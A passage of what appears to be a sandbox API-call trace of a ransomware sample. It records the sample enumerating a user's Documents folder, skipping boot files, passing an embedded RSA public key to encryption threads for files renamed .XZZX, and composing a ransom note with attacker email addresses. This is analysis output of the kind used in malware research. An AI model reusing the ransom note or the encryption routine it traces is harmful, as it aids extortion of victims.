LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0175.974] lstrcpyW (in: lpString1=0x17be7c, lpString2="8441A0B23FA9B9126D832A0D43D69D5A.XZZX" | out: lpString1="8441A0B23FA9B9126D832A0D43D69D5A.XZZX") returned="8441A0B23FA9B9126D832A0D43D69D5A.XZZX" [0175.974] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0175.974] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xa90 [0175.974] Sleep (dwMilliseconds=0x96) [0176.129] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0176.129] lstrcmpW (lpString1="A0DC431228DE1E088FD30DB72CF60250.XZZX", lpString2="..") returned 1 [0176.129] lstrcmpW (lpString1="A0DC431228DE1E088FD30DB72CF60250.XZZX", lpString2=".") returned 1 [0176.129] StrStrW (lpFirst="A0DC431228DE1E088FD30DB72CF60250.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0176.129] StrStrW (lpFirst="A0DC431228DE1E088FD30DB72CF60250.XZZX", lpSrch="ntldr") returned 0x0 [0176.129] StrStrW (lpFirst="A0DC431228DE1E088FD30DB72CF60250.XZZX", lpSrch="NTLDR") returned 0x0 [0176.129] StrStrW (lpFirst="A0DC431228DE1E088FD30DB72CF60250.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0176.129] StrStrW (lpFirst="A0DC431228DE1E088FD30DB72CF60250.XZZX", lpSrch="ntdetect.com") returned 0x0 [0176.129] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned 65 [0176.129] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") [0176.130] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0176.130] lstrcpyW (in: lpString1=0x17be7c, lpString2="A0DC431228DE1E088FD30DB72CF60250.XZZX" | out: lpString1="A0DC431228DE1E088FD30DB72CF60250.XZZX") returned="A0DC431228DE1E088FD30DB72CF60250.XZZX" [0176.130] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0176.130] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xa94 [0176.130] Sleep (dwMilliseconds=0x96) [0176.285] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0176.285] lstrcmpW (lpString1="B4A323B51740B3FD1D50DD1D1B6D9845.XZZX", lpString2="..") returned 1 [0176.285] lstrcmpW (lpString1="B4A323B51740B3FD1D50DD1D1B6D9845.XZZX", lpString2=".") returned 1 [0176.285] StrStrW (lpFirst="B4A323B51740B3FD1D50DD1D1B6D9845.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0176.285] StrStrW (lpFirst="B4A323B51740B3FD1D50DD1D1B6D9845.XZZX", lpSrch="ntldr") returned 0x0 [0176.285] StrStrW (lpFirst="B4A323B51740B3FD1D50DD1D1B6D9845.XZZX", lpSrch="NTLDR") returned 0x0 [0176.285] StrStrW (lpFirst="B4A323B51740B3FD1D50DD1D1B6D9845.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0176.285] StrStrW (lpFirst="B4A323B51740B3FD1D50DD1D1B6D9845.XZZX", lpSrch="ntdetect.com") returned 0x0 [0176.285] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned 65 [0176.285] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") [0176.286] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0176.286] lstrcpyW (in: lpString1=0x17be7c, lpString2="B4A323B51740B3FD1D50DD1D1B6D9845.XZZX" | out: lpString1="B4A323B51740B3FD1D50DD1D1B6D9845.XZZX") returned="B4A323B51740B3FD1D50DD1D1B6D9845.XZZX" [0176.286] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0176.286] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xa98 [0176.286] Sleep (dwMilliseconds=0x96) [0176.441] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0176.441] lstrcmpW (lpString1="EE9B10B00F697CE4836159F013D6612C.XZZX", lpString2="..") returned 1 [0176.441] lstrcmpW (lpString1="EE9B10B00F697CE4836159F013D6612C.XZZX", lpString2=".") returned 1 [0176.441] StrStrW (lpFirst="EE9B10B00F697CE4836159F013D6612C.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0176.441] StrStrW (lpFirst="EE9B10B00F697CE4836159F013D6612C.XZZX", lpSrch="ntldr") returned 0x0 [0176.441] StrStrW (lpFirst="EE9B10B00F697CE4836159F013D6612C.XZZX", lpSrch="NTLDR") returned 0x0 [0176.441] StrStrW (lpFirst="EE9B10B00F697CE4836159F013D6612C.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0176.441] StrStrW (lpFirst="EE9B10B00F697CE4836159F013D6612C.XZZX", lpSrch="ntdetect.com") returned 0x0 [0176.441] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned 65 [0176.441] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") [0176.442] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0176.442] lstrcpyW (in: lpString1=0x17be7c, lpString2="EE9B10B00F697CE4836159F013D6612C.XZZX" | out: lpString1="EE9B10B00F697CE4836159F013D6612C.XZZX") returned="EE9B10B00F697CE4836159F013D6612C.XZZX" [0176.442] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0176.442] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xa9c [0176.442] Sleep (dwMilliseconds=0x96) [0176.598] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0176.598] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0176.598] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0176.598] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0176.598] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0176.598] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0176.598] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0176.598] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 1 [0176.598] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 0 [0176.598] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa" [0176.599] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\*.*" [0176.599] SetErrorMode (uMode=0x1) returned 0x1 [0176.599] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\_HELP_INSTRUCTION.TXT") returned 82 [0176.599] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0176.599] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0176.599] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0xaa0) returned 0x0 [0176.599] RegQueryValueExW (in: hKey=0xaa0, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x46aef0, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x46aef0*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0176.599] RegCloseKey (hKey=0xaa0) returned 0x0 [0176.599] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0176.599] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0176.599] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xaa0 [0176.600] CloseHandle (hObject=0xaa0) returned 1 [0176.600] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x43728b8 [0176.600] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa") returned="lhhNd9leW5xmlXw00JFa" [0176.600] lstrcpyW (in: lpString1=0x17b644, lpString2="lhhNd9leW5xmlXw00JFa" | out: lpString1="lhhNd9leW5xmlXw00JFa") returned="lhhNd9leW5xmlXw00JFa" [0176.600] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0176.600] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0176.600] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0176.600] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0176.600] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0176.600] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0176.600] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0176.600] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0176.600] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0176.600] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0176.600] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0176.600] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0176.600] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0176.600] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0176.600] lstrcmpW (lpString1="IkpxUp8UshIgHl1", lpString2="..") returned 1 [0176.600] lstrcmpW (lpString1="IkpxUp8UshIgHl1", lpString2=".") returned 1 [0176.600] lstrcpyW (in: lpString1=0x17c4d0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa" [0176.600] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0176.600] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpString2="IkpxUp8UshIgHl1" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1" [0176.600] SetErrorMode (uMode=0x1) returned 0x1 [0176.600] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1" [0176.600] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0176.600] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0176.600] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\*.*" [0176.600] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\*.*", lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0x3cdea18 [0176.601] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1") returned="IkpxUp8UshIgHl1" [0176.601] lstrcpyW (in: lpString1=0x17a5a4, lpString2="IkpxUp8UshIgHl1" | out: lpString1="IkpxUp8UshIgHl1") returned="IkpxUp8UshIgHl1" [0176.601] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0176.601] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0176.601] lstrcmpW (lpString1="069C108614226DDA8ED0A1A1188F5222.XZZX", lpString2="..") returned 1 [0176.601] lstrcmpW (lpString1="069C108614226DDA8ED0A1A1188F5222.XZZX", lpString2=".") returned 1 [0176.601] StrStrW (lpFirst="069C108614226DDA8ED0A1A1188F5222.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0176.601] StrStrW (lpFirst="069C108614226DDA8ED0A1A1188F5222.XZZX", lpSrch="ntldr") returned 0x0 [0176.601] StrStrW (lpFirst="069C108614226DDA8ED0A1A1188F5222.XZZX", lpSrch="NTLDR") returned 0x0 [0176.601] StrStrW (lpFirst="069C108614226DDA8ED0A1A1188F5222.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0176.601] StrStrW (lpFirst="069C108614226DDA8ED0A1A1188F5222.XZZX", lpSrch="ntdetect.com") returned 0x0 [0176.601] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned 81 [0176.601] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") [0176.602] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0176.602] lstrcpyW (in: lpString1=0x17addc, lpString2="069C108614226DDA8ED0A1A1188F5222.XZZX" | out: lpString1="069C108614226DDA8ED0A1A1188F5222.XZZX") returned="069C108614226DDA8ED0A1A1188F5222.XZZX" [0176.602] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0176.602] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xaa8 [0176.602] Sleep (dwMilliseconds=0x96) [0176.753] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: 